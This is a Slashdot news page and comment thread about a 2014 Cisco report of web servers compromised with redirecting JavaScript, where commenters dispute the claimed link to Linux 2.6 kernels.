Forgot your password?
typodupeerror
Security The Internet Linux

Speedy Attack Targets Web Servers With Outdated Linux Kernels 93

Posted by Soulskill
from the update-your-junk dept.
alphadogg writes "Web servers running a long-outdated version of the Linux kernel were attacked with dramatic speed over two days last week, according to Cisco Systems. All the affected servers were running the 2.6 version, first released in December 2003. 'When attackers discover a vulnerability in the system, they can exploit it at their whim without fear of it being remedied,' Cisco said. After the Web server has been compromised, the attackers slip in a line of JavaScript to other JavaScript files within the website. That code bounces the website's visitors to a second compromised host. 'The two-stage process allows attackers to serve up a variety of malicious content to the visitor,' according to Cisco."
This discussion has been archived. No new comments can be posted.

Speedy Attack Targets Web Servers With Outdated Linux Kernels

Comments Filter:
  • No Details (Score:5, Insightful)

    by OverlordQ (264228) on Friday March 21, 2014 @03:20PM (#46545951) Journal

    So the webserver was compromised and JavaScript was inserted and their first thought is it's the kernel?

    • by jythie (914043)
      It would have been nice if they at least said WHICH kernel versions, or which web server, or which version of web server.

      I admit, I have some fairly obsolete (and difficult to upgrade) linux boxes running in my lab, this is the kind of detail I would kinda like to know....
      • by Anonymous Coward

        All Redhat/CentOS versions plus nearly 100% of linux-based routers run 2.6

        • Red Hat's version numbers may or may not be relevant when you're trying to find out whether your kernel is vulnerable. Red Hat back ports a lot of security fixes, but doesn't change the kernel number.

          • by Penguinisto (415985) on Friday March 21, 2014 @04:54PM (#46546649) Journal

            It gets worse (or IMHO, less competent):

            Author Comment FTFA (bottom of page - emphasis mine):

            "We haven’t identified the initial attack vector. We have no reason to suspect that the attack isn’t via http. I’d be very interested to hear from any affected sys admins if they identify how the attackers gain access."

            In other words, they don't even know if it's the effing kernel at this point -all they know is that 2,000 some-odd websites have been bit, and they all use the absolute most common kernel version for webservers on the planet (2.6.x).

              Hell, for all we know it could be some commonly-shared crappy PHP script getting popped. :/

        • by gweihir (88907)

          2.6.32.61 is a currently supported longterm kernel release from kernel.org.

          • Don't worry, its a crap report with no real analysis.
            Here is a short list of some of the actual compromised sites from the WhiteFir analysis report
            Compromised Websites

            archive.mrpools.co.uk Windows Server 2003
            blueprintbowling.com Windows Server 2008 R2
            hwy65mx.com Windows Server 2003
            jandjpoolspa.com Windows Server 2003
            mussotra.com Windows Server 2003

            Second Compromised Websites

            3d2print.eu FreeBSD
            7va.cc Windows Server 2008 R2
            babycaust.info Windows Server 2008
            banderil.com.ar Windows Serv
            • by gweihir (88907)

              Thanks, that does not look like an OS issue at all with that FreeBDS machine in there.

    • by markdavis (642305)

      Yeah, the article is extremely uninformative. They say 2.6 and yet RHEL/CENTOS 6.5 are 2.6... so that meaning nothing as far as being "old" or "outdated".

      More likely to be an Apache vulnerability, but who knows. Maybe some other article could shed some light on it.

    • by sgt scrub (869860)

      Nobody in the security sector that I know believes there is a relationship between the kernel version and the attacks. The only reason I could see anyone mentioning it is if they had some reason for people to see Linux negatively. The vast majority of IPS/Firewalls out there taking Ciso space in the datacenters are based on Linux. I do know no of any of them that are not running kernel 2.6.X.

  • No mention of how the 2.6 kernel was compromised . Besides 2.6 is quite ancient by any standards . Why'd anyone want to run it?
    • by higuita (129722)

      because is the default kernel from RHEL: 2.6.18-238.12.1.el5

      • by X0563511 (793323)

        EL5 is, while supported, getting a bit old. Hell, EL7 is just around the corner!

        • Re:where's the door? (Score:4, Interesting)

          by hermitdev (2792385) on Friday March 21, 2014 @04:11PM (#46546315)
          While it is supported, and RH claims backwards compatibility, they do have an annoying habit of breaking things. I remember going from a point minor version of RHEL 5 (I think it was 5.5 to 5.6; it might have been an earlier release) to the next, and they broke the behavior of semaphores. In the prior version, a "sem_wait" would block until the semaphore was signaled, in the next version, it'd indicate errno EAGAIN. This was an unexpected change and required code changes for my company's apps at the time to busy wait when trying to acquire a semaphore.
        • by dbIII (701233)
          That's what you need to run the current version of some commercial software. While I don't have it on a webserver I do have centos5 (designed to be very similar to RHEL5) on a lot of machines. Of course they use an old version of java as well.
          Yes, I'd run 100% open source if there were not certain constraints if only to get off the old platform (and avoid shit like having to wait three months to get a software licence key!).
    • Re:where's the door? (Score:5, Informative)

      by Anonymous Coward on Friday March 21, 2014 @03:29PM (#46546031)

      I think its pretty unfair to refer to kernel 2.6, subversions of 2.6 were in use in one form or another from 2003 to 2011, 3.0 was brought about because Linus randomly decided to up the version number one day, not because of any single significant change. Plenty of old distros that still have security support are running 2.6 kernels that are regularly patched and completely up to date security wise.

    • by jythie (914043)
      The same could be asked for why anyone would take down perfectly good, functioning servers to upgrade them to 3?
    • by gweihir (88907)

      2.6.32.61 is a currently supported longterm kernel from kernel.org. 2.6.32 in some variant is used in many virtual server setups.

  • by Nimey (114278) on Friday March 21, 2014 @03:29PM (#46546025) Homepage Journal

    All the affected servers were running the 2.6 version, first released in December 2003.

    Not even wrong. I guarandamntee you that none of the affected computers were actually running 2.6.0, and it wouldn't have been /that/ long ago that such an obviously stupid and ill-researched claim wouldn't have been posted.

    Soulskill, you /do/ understand that there were forty different versions of Linux in the 2.6 series, do you not? You do understand that the final 2.6 release was in August 2011 and it was numbered 2.6.39.4, which I know because I did 5 minutes of basic Googling?

    • by Bacon Bits (926911) on Friday March 21, 2014 @04:18PM (#46546439)

      You didn't read the article, did you? TFS is vague, but so is the article. The article contains no details about the vulnerability. It only contains information about the severity and locations of the attacks. Comments on the article add "Version 2.6.18 appeared to be particularly prevalent." The article is shockingly limited on details.

      Slashdot's editors are often appear to be asleep at the wheel, but this time the editors weren't adding anything that wasn't in the original article.

    • by DRJlaw (946416)

      Not even wrong. I guarandamntee you that none of the affected computers were actually running 2.6.0, and it wouldn't have been /that/ long ago that such an obviously stupid and ill-researched claim wouldn't have been posted.

      Soulskill didn't write "the 2.6.0 version," he wrote "the 2.6 version." As in potentially 2.6.0 through 2.6.39.4. When posters refer to Windows, you don't automatically assume Windows 1.0. When posters refer to Windows XP, you don't automatically assume Windows XP RTM. Why would you

      • by DRJlaw (946416)

        And an unfortunate submission with "Michael" rather than "Martin" sucks the air out of the room. Wheeee...

      • by Nimey (114278)

        That's exactly my point. "The 2.6 version" is meaningless and Soulskill should have known better; there's a huge difference between 2.6.0 and 2.6.39.

        • by DRJlaw (946416)

          No, you're point is to completely ignore TFA's statement that "We saw affected machines with a whole range of kernel 2.6 subversions."

          There's no point in demanding that the summary list the 36 subversions that are vulnerable and/or the 4 which are not when the source article does not include any such information to begin with. Any whoever moderated your subsequent replay as insightful is a moron.

          • by Nimey (114278)

            If that's what TFA meant then that's what it should have said. As to the summary, instead of "the 2.6 version" (quoting TFA) it should have said something like "many Linux kernels in the 2.6 series", which would at least have not sounded so naively ignorant.

            Since TFA didn't bother clearly saying what versions are vulnerable (except, as you assert, in the comments) then it wasn't worthy of a /. post, which is my whole fucking point. English, motherfucker, do you speak it?

            • by DRJlaw (946416)

              Since TFA didn't bother clearly saying what versions are vulnerable (except, as you assert, in the comments) then it wasn't worthy of a /. post, which is my whole fucking point. English, motherfucker, do you speak it?

              Your point never addressed whether the TFA was worthy of a /. post. Your point was directed at the article summary and Soulskill's editing up until 8:04 EDT. Once you finally notices that TFA contracted your rant, you suddenly chose to attack it. I can't read something that hasn't been writt

    • by gweihir (88907)

      And a 10 second look at www.kernel.org shows you that 2.6.32.61 is a currently supported longterm kernel version, with last update mid of 2013. This thing may be old, but it is not abandoned or insecure.

  • by Gothmolly (148874) on Friday March 21, 2014 @03:33PM (#46546057)

    "All of the affected web servers that we have examined use the Linux 2.6 kernel."

    Right, because RHEL (and Centos) run 2.6.... so sampling ANY number of servers is likely going to show that they run 2.6.

    Is Slashdot just a click redirector these days? Do 'editors' remotely 'edit' anything?

    • by Nimey (114278)

      Do 'editors' remotely 'edit' anything?

      Only when they feel like it.

    • by mlts (1038732)

      TFA tells us nothing. Even the followup about 2.6.18 being the worst culprit and the note that upgrading the kernel will not help makes it even more pointless.

      My fix: yum upgrade, and if the update does grab a new kernel, reboot. There was a kernel bug (long since patched) a few years ago that allowed attacks past even SELinux... but if one is running a recent distro, this shouldn't be an issue.

      Of course, one should doublecheck what is likely the real culprit... applications like apache and its modules,

  • by Virtucon (127420) on Friday March 21, 2014 @03:35PM (#46546071)

    "We think you're door is unlocked but we won't say which house it is or where it's located."

    Talk about vague.

    • These are always a double-edged sword. When releasing accurate details, you help administrators to secure their servers, but at the same time you give attackers more information to help them conduct their attack.
      • by JohnFen (1641097)

        One edge of that sword is a lot duller than the other. The cracker community is likely already well aware of how the exploit works (they do talk with each other frequently, after all), so it would most likely be a case of telling them what they already know.

  • Danger! 2.6 kernel! MASSIVE INFECTIONS! While we're at it, lets talk about Windows XP...
  • Becomes The Internet of unpatched easily pwned things.

  • There is a list of affected sites linked in the comments. The first one on the list is running FreeBSD. I did not bother checking the rest.
    • by JohnFen (1641097)

      So then it's very likely not a kernel exploit.

      • by kwark (512736)

        I found a compromised website on my companies shared hosting platform (which runs a 2.6 kernel (Debian/oldstable)). But the files where "infected" by a ftp account via proftpd on a machine running a 3.2 kernel (Debian/stable), the login was right on the first try. My guess is malware on the site owners machines stealing ftp logins (which is old news).

    • by JohnFen (1641097)

      Oh, hell, looking through that list... there are Windows Server installations in there as well!

  • by cant_get_a_good_nick (172131) on Friday March 21, 2014 @06:24PM (#46547247)

    From the comments on the announce page, since (almost) nobody will go over there.

    The first site on compromise_1.txt [cisco.com] seems to be running “Apache/2.2.26 (FreeBSD) DAV/2 mod_ssl/2.2.26 OpenSSL/0.9.8y”, which does not quite sound like it’d be running Linux at all. As others have already pointed out, I would not blame this on a Linux kernel bug yet.

    So, it looks like the "old 2.6.x kernel releases" was really just a signal for "old nonupdated code".

    BTW: for those who bitch about "well the 2.6 line was patched and maintained all the way to 2011" they do have a line where they imply the 2.6 kernels are early kernels, not the latter 2.6.20 whatever ones, but it's not a well written article and is easy to miss.

  • by wjcofkc (964165) on Friday March 21, 2014 @06:27PM (#46547269)
    FTFA:

    All of the affected web servers that we have examined use the Linux 2.6 kernel.

    For clarity, the old kernel is a common indicator on the compromised hosts.

    Okay, so between 2003 and 2011 there have probably been 3 dozen versions of that kernel. The overwhelming majority of Linux based web servers run the vetted, thoroughly tested and patched, tried and true 2.6 series Linux Kernel. This makes me concerned Cisco doesn't understand what it means to run a production system. Also, what do they even mean by "web server" are we to assume Apache? Because there are alternatives in use... lots. Considering most Linux based web servers are running a variation of the 2.6 kernel, then of course that's where they will the find the attacks (Duh anyone?). I would be much more interested in what web server we are talking about and any commonality between them over the kernel of the operating system. I am shaking my head trying to figure what this article is really trying to communicate especially since they practically shoot down most of their article with the "Update" at the top.

    Although users of Cisco’s Cloud Web Security solution are protected from this attack...

    Oh, I get it now.

  • I didn't realize Windows servers were running Linux 2.6 under the hood...fascinating! http://www.whitefirdesign.com/... [whitefirdesign.com]
  • by shipofgold (911683) on Friday March 21, 2014 @10:32PM (#46548711)

    The comments at the end of the CISCO article flush out the fact that they noticed a line of malicious javascript at the end of a large number of .js files but they have no idea how it got there.

    In fact the list of JS files given include many that are not even running on Linux servers.

    The author is irresponsible at best, and incompetent at worst...

    • by sclark46 (969374)

      The comments at the end of the CISCO article flush out the fact that they noticed a line of malicious javascript at the end of a large number of .js files but they have no idea how it got there.

      In fact the list of JS files given include many that are not even running on Linux servers.

      The author is irresponsible at best, and incompetent at worst...

      You are absolutely correct. I am appalled that /. even posted this with the title they used.

You are in a maze of UUCP connections, all alike.

Working...